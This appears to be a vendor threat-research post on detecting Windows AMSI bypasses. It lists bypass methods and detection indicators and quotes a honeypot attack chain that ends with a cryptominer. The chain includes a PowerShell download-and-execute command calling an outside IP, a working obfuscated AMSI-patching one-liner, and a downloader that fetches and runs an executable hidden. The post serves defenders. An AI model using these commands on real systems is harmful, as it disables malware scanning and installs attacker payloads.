Detecting Windows AMSI Bypass Techniques
Techniques bypassing AMSI were primarily used by security researchers and penetration testers. In recent years, however, cybercriminals have abused this and included the method as a feature in malware routines to evade detection that allowed them to continuously operate in a victim’s computer. Prior to AMSI, detections of fileless threats proved difficult. Previously documented methods used to achieve an AMSI bypass were:
- Obfuscation and/or encryption
- PowerShell downgrade
- Hooks and unhooks
- Memory patching
- Forcing an error
- Registry modifications
- DLL hijacking
- Reflection
The whole topic of bypassing AMSI is complex, but the goal is to break the AMSI “chain” at some point. The AMSI chain’s basic blocks is primarily composed of three components: The data provider, amsi.dll, and the AMSI provider. Based on the list of methods for bypassing AMSI, we can see the difficulty of detection can vary and will depend on the capabilities available in a machine.
Manually finding an AMSI bypass
Analysts can look for processes bypassing AMSI in and via the following areas:
- Registry
- HKLM\SOFTWARE\Microsoft\AMSI\Providers\
*\Microsoft\Windows Script\Settings\AmsiEnable
COM Hijacking
- HKLM\SOFTWARE\Microsoft\AMSI\Providers\
- Code execution (such as patterns, file names, and fuction names, among others)
- PowerShell 2.0
- AmsiInitialize + VirtualProtect
- GetProcAddress + VirtualProtect
- LoadLibrary + any AMSI or related DLL
- Memory
- AMSI and related DLLs (DLL hijacking via amsi.dll)
- Various hooks
AMSI bypass in real attacks
Observing AMSI bypass in real attacks, we also found them as payloads, process injections, and miner configurations that can vary based on the time of deployment and targets. The following is an example of how it was used for a compromise from one of our cloud honeypots:
- After the initial access, a PowerShell script is executed
powershell “IEX(New-Object Net.WebClient).DownloadString(‘hxxp://89.34.27.167/lol.ps1′)“
- AMSI bypass
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType((“{5}{2}{0}{1}{3}{6}{4}” -f ‘ut’,(‘oma’+’t’+’ion.’),’.A’,(‘Ams’+’iUt’),’ls’,(‘S’+’ystem.’+’Manage’+’men’+’t’),’i’)).GetField((“{1}{2}{0}” -f (‘Co’+’n’+’text’),(‘am’+’s’),’i’),[Reflection.BindingFlags](“{4}{2}{3}{0}{1}” -f(‘b’+’lic,Sta’+’ti’),’c’,’P’,’u’,(‘N’+’on’))).GetValue($null),0x41414141)
- Downloader execution based on system architecture
$cc = “http[:]//89.34.27.167”
$is64 = (([Array](Get-WmiObject -Query “select AddressWidth from Win32_Processor”))[0].AddressWidth -eq 64)
$dst=”$env:TMP\networkservicess.exe”
(New-Object Net.WebClient).DownloadFile(“$cc/ps1-6.exe”, “$dst”)
Start-Process “$dst” -windowstyle hidden
- Additional payloads are loaded into memory using ps1-6[.]exe.
- The process’ payloads transform into injectors that perform process hollowing on the InstallUtil.exe process.
- This ends with a complete payload download of an XMRig cryptocurrency miner deployment and setup.
Detecting AMSI bypass using Trend Micro Vision One™
We looked at some of the implementations of AMSI bypass and the visibility enabled by Trend Micro Vision One™, Trend Micro Cloud One™- Workload Security, and Trend Micro Apex One™ to mitigate the risks brought on by the known and unknown methods to circumvent this security feature. Using the indicators and attributes of attempts logged from workloads and endpoints, these solutions and platforms allow security teams and analysts a wider view of attack attempts for immediate and actionable response.
As a tool used to accompany other components and processes, the Observed Attack Techniques (OATs) for select AMSI bypasses determine the occurrences as suspicious and warranting investigation. The OAT results for bypasses are categorized as “High Severity” and immediately checks the endpoint for related components and events as part of evidence for analysis.
Read More HERE